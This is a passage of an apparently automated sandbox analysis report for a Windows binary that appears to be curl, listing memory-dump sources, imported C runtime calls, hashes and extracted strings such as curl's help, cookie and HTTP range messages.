                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: puts$free
                                        • String ID: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".$Invalid category provided, here is a list of all categories:$Usage: curl [options...] <url>$all$category
                                        • API String ID: 1067472072-287794235
                                        • Opcode ID: 45a4dcad6dc834da2e3f52f0b3c40cb79248ddd925d79fd9dccdec8fa2d29ee8
                                        • Instruction ID: 1c38e0145c1dc8dd6bf5546aec5db089554407ceaf1dbd226bd329613fd266c6
                                        • Opcode Fuzzy Hash: 45a4dcad6dc834da2e3f52f0b3c40cb79248ddd925d79fd9dccdec8fa2d29ee8
                                        • Instruction Fuzzy Hash: 51F09021209A10D79B2D77202D1EFED2951AF817B0B98C02EF422769C7EF64CC8143AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %%25%s]$%25$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
                                        • API String ID: 0-326007067
                                        • Opcode ID: 3833ff69c8f925f3341f317cfd872358a99c4ec9e3296d3195f150291a06660f
                                        • Instruction ID: df8b58cc83f6f43f3e692f88920ccf4b616ad1cb9c10833ff0aa5c05dcbff6d8
                                        • Opcode Fuzzy Hash: 3833ff69c8f925f3341f317cfd872358a99c4ec9e3296d3195f150291a06660f
                                        • Instruction Fuzzy Hash: F702BF31E00716EBDF658FA8D8507AEBBF1AF49710F18806AE901AB341D7729D51CBB0
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A1B4
                                          • Part of subcall function 0010A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A4FB
                                          • Part of subcall function 0010A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A52C
                                          • Part of subcall function 0010A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010A54E
                                          • Part of subcall function 0010A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A565
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A211
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A267
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010A426
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$calloc$malloc
                                        • String ID: CompleteAuthToken failed: %s$HTTP$InitializeSecurityContext failed: %s$Negotiate$SPNEGO handshake failure (empty challenge message)$SSPI: couldn't get auth info
                                        • API String ID: 3103867982-170984166
                                        • Opcode ID: 0cc3f4ef27cc188ba052b87a188083dea457ae6cb693523e4d9abac9d7640195
                                        • Instruction ID: 756c27f029b31fa7afe4b507b1b8da28c2558e578b52c5dd76bc117fe387265e
                                        • Opcode Fuzzy Hash: 0cc3f4ef27cc188ba052b87a188083dea457ae6cb693523e4d9abac9d7640195
                                        • Instruction Fuzzy Hash: 74C13D75A00629AFDB24CF14DD54BD9B7B5FF48310F4081AAE849E7690DBB0AE94CF81
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DC0A8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DC0C1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DC19D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DC1B7
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,74F83C50,00000000,000E182F), ref: 000DF671
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF685
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF699
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6AD
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6C1
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6D5
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6E9
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6FD
                                          • Part of subcall function 000DF65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF70F
                                          • Part of subcall function 000E0830: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E086B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$calloc
                                        • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:$ignoring failed cookie_init for %s
                                        • API String ID: 3095843317-3179978524
                                        • Opcode ID: 55259b9a28bdf0aa9e8b6049fbaf16683a9b1367c85a162978ae5df1fe5a15a5
                                        • Instruction ID: c354ab74751c5acdbb4db27d320934a3ada6ee8fc5652e7f34bc874e7f852d47
                                        • Opcode Fuzzy Hash: 55259b9a28bdf0aa9e8b6049fbaf16683a9b1367c85a162978ae5df1fe5a15a5
                                        • Instruction Fuzzy Hash: B881B571704712CBDB689F289851A6E77D2AF85710F24843FE84ADB392DF74DC428AB1
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E4488
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E44AE
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000DA931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 000E4544
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000DA931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 000E456A
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000DA931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 000E4590
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 000E45AC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000), ref: 000E45C1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: malloc$___from_strstr_to_strchrfree
                                        • String ID:
                                        • API String ID: 402731313-0
                                        • Opcode ID: 9effbe2fde94fc8d06b215e5496ce4bd7278af0088511faeadba7cd63dc6ea1e
                                        • Instruction ID: d1cf56be6e1119afb083d8b1c8bd8f596dcb3c22d0982cfe4a4e124d516ae406
                                        • Opcode Fuzzy Hash: 9effbe2fde94fc8d06b215e5496ce4bd7278af0088511faeadba7cd63dc6ea1e
                                        • Instruction Fuzzy Hash: 67816C72E0065ADFCF28CFA9D8845AEBBF5EF88350B14816AE815F7251DB309D41CB90
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C38EC
                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C38F4
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3902
                                          • Part of subcall function 000C1018: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,000C3910), ref: 000C101E
                                          • Part of subcall function 000C1018: _setmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,000C3910), ref: 000C1025
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3911
                                        • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3919
                                        • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 000C393E
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C398D
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(001174AB), ref: 000C39B7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C39FD
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000C3A3D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_func$_fileno_strdup$_fstat64_setmodefreeftell
                                        • String ID:
                                        • API String ID: 4154865980-0
                                        • Opcode ID: f662e11e2b585810eccdd064749a96843097442b4a0e968c792f1c7e8f45506a
                                        • Instruction ID: 33614df1026b259ce96e16e1f4f0dd26cbd364c71d685169b2761fc901409ae0
                                        • Opcode Fuzzy Hash: f662e11e2b585810eccdd064749a96843097442b4a0e968c792f1c7e8f45506a
                                        • Instruction Fuzzy Hash: AF519172D20719CFCB24DFA4C985B9DBBF5FF49720F20811EE445A7241EBB0AA418B40
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000D5D8C,74F83C50,000E16C0), ref: 000D49E7
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D49FB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A0F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A23
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A37
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A4B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A5F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A73
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A87
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4A9B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4AAF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D4AC3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 1fce5bc8069036c6c3cf19b1c6b3f28ac739190a3a25462d8b1f8d5351231459
                                        • Instruction ID: 09868995e38536c27eb11be9091fcbfa36f4d2ee7d4dbe0b939942309c4adcec
                                        • Opcode Fuzzy Hash: 1fce5bc8069036c6c3cf19b1c6b3f28ac739190a3a25462d8b1f8d5351231459
                                        • Instruction Fuzzy Hash: CC21A732614829EB8B091F14FD0845CBBB6FF88261315C02BE45193A71CFB52CA28FE6
                                        APIs
                                        • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 0010078E
                                          • Part of subcall function 001004E4: ___from_strstr_to_strchr.LIBCMT ref: 00100503
                                        Strings
                                        • Accept-ranges: bytes, xrefs: 00100820
                                        • Content-Length: %I64d, xrefs: 00100851
                                        • Can't get the size of file., xrefs: 001009AF
                                        • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 00100935
                                        • failed to resume file:// transfer, xrefs: 00100A3D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchr_fstat64
                                        • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer
                                        • API String ID: 1237401293-1509146019
                                        • Opcode ID: 0e4a5c3950bbc5fabc760b3f576b9e87a2f7974b52a6ed811a1aeea5094af620
                                        • Instruction ID: 483140d8cbb82f764d35dbe3cb8e8123bce973a8eacd3bbcd12516ecfe354554
                                        • Opcode Fuzzy Hash: 0e4a5c3950bbc5fabc760b3f576b9e87a2f7974b52a6ed811a1aeea5094af620
                                        • Instruction Fuzzy Hash: C4D1A5756083419FEB25DF28C841BAA77D5AF98314F14453EF8C99B2C2EBB0DC448B92
                                        APIs
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(%25,00000001,00000003), ref: 000E4B8D
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000E4C01
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 000E4C1F
                                        Strings
                                        • Please URL encode %% as %%25, see RFC 6874., xrefs: 000E4B9A
                                        • Invalid IPv6 address format, xrefs: 000E4BEF
                                        • %25, xrefs: 000E4B88
                                        • No valid port number in connect to host string (%s), xrefs: 000E4C3E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrstrncmpstrtol
                                        • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                        • API String ID: 236576716-4202423297
                                        • Opcode ID: ea66e66f635a10ee913415ed4b666e46a14a7d751e1163329a7156d8b52c3b36
                                        • Instruction ID: 1d0932cac9ff21ac0c5ee2a144da961bb766ff07372bd2707eb95f1d764111db
                                        • Opcode Fuzzy Hash: ea66e66f635a10ee913415ed4b666e46a14a7d751e1163329a7156d8b52c3b36
                                        • Instruction Fuzzy Hash: F451A834905299AFDB748F2AE8417FC7BEAEF45314F2040AAE880B7392D7308845CB90
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E086B
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E08DD
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00117A20), ref: 000E08F7
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E093F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E096E
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E0992
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,000E126F), ref: 000E0A02
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000E0A14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fclosefree$__acrt_iob_funccallocfopenmalloc
                                        • String ID: Set-Cookie:
                                        • API String ID: 3610089413-2427311273
                                        • Opcode ID: 6e975d00edfd9f76189c074bece2245c20c4e007e94ff50028b9a33398b28a99
                                        • Instruction ID: 264a8984b3386967a8eca7a76aab5fc619546607ea5f3e500a3910badfb64e8b
                                        • Opcode Fuzzy Hash: 6e975d00edfd9f76189c074bece2245c20c4e007e94ff50028b9a33398b28a99
                                        • Instruction Fuzzy Hash: 9F412A317047819FE7245F29A8447ADBBD59B84710F18806EF985B72C3DEE08CC686E6
                                        APIs
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0( ,?,?,?,?,?,?,?,?,?), ref: 000C14A3
                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?,?,?,?,?,?,?), ref: 000C1536
                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 000C154F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: fflushfputcfputs
                                        • String ID: $%02x $%04zx: $%s%s, %zu bytes (0x%zx)$<= Recv header
                                        • API String ID: 2904194729-208095841
                                        • Opcode ID: 51626955c10b860ad2451d53bd48d3e04dd690aeaade61ce7779ba87851349e8
                                        • Instruction ID: 834b7c0b1592e5b668c9c8ccaef38ac314958b79868c77fe0d534eb3d0048667
                                        • Opcode Fuzzy Hash: 51626955c10b860ad2451d53bd48d3e04dd690aeaade61ce7779ba87851349e8
                                        • Instruction Fuzzy Hash: 4B41AE72A04258EBDF29CF54DD85AED7BB1EF46314F14406AF816AA242C2719EA1CB90
                                        APIs
                                        • __aulldiv.LIBCMT ref: 000CE314
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000CE346
                                        • __aulldiv.LIBCMT ref: 000CE39A
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000CE3CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__aulldiv__ehfuncinfo$??2@
                                        • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--
                                        • API String ID: 1185945948-1858174321
                                        • Opcode ID: 8f40f5c20e6ac19e0c26b8bd5a6be9035ea007d04b8ad856bbb4efe58b9123d7
                                        • Instruction ID: 28de0d396f1be4386614df0e171dcb07b01e47d1b9e151f45fab9f5804d53101
                                        • Opcode Fuzzy Hash: 8f40f5c20e6ac19e0c26b8bd5a6be9035ea007d04b8ad856bbb4efe58b9123d7
                                        • Instruction Fuzzy Hash: 9631E671B003947AEB2566698C4BFAF6DADCBD5B50F148038B904F7183E6B19F508664
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000C7BFD
                                          • Part of subcall function 000D09FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 000D0A07
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7C56
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C7CB1
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C7CC1
                                        Strings
                                        • unsupported range point, xrefs: 000C8216
                                        • Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain., xrefs: 000C7C99
                                        • %I64d-, xrefs: 000C7C40
                                        • A specified range MUST include at least one dash (-). Appending one for you!, xrefs: 000C7C26
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$___from_strstr_to_strchr_errno_strdup
                                        • String ID: %I64d-$A specified range MUST include at least one dash (-). Appending one for you!$Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain.$unsupported range point
                                        • API String ID: 4096323884-1864133270
                                        • Opcode ID: 71973822aff8fb2b7fc6294063969475c87bbb158af0a73b0c9487bc17110044
                                        • Instruction ID: 851cd008ccd78c924344a10637e782b5dd4a708fa32437c2767ba16352c682a0
                                        • Opcode Fuzzy Hash: 71973822aff8fb2b7fc6294063969475c87bbb158af0a73b0c9487bc17110044
                                        • Instruction Fuzzy Hash: 4621A97120C3029EE7689B309D86FBF77DA9F94300F24481EF59AD61C2DF71E8459A16
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?), ref: 000CF58A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
                                        • API String ID: 1294909896-2831394677
                                        • Opcode ID: 97340a6354fe12119d6dcdbcd33fadcaf3e6e05d4c1e6cfeb771a71b013bb24f
                                        • Instruction ID: 0b24f13581a29267c3c1eda9de50cc44c61ffaa0900c461be86c5939a27cf7ab
                                        • Opcode Fuzzy Hash: 97340a6354fe12119d6dcdbcd33fadcaf3e6e05d4c1e6cfeb771a71b013bb24f
                                        • Instruction Fuzzy Hash: E3610172608382ABCB21DF248840EBF7BE6AF99354F18443DF98997282D231DD44C793
                                        APIs
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,HTTP,?,?), ref: 000F4F12
                                        • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000005C,?,?,00000000,HTTP,?,?), ref: 000F4F25
                                        • _mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,0000002F), ref: 000F4F34
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F4F9C
                                        • _mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(00000000,?,?), ref: 000F4FAC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F4FC0
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000F4FC9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5000
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5013
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
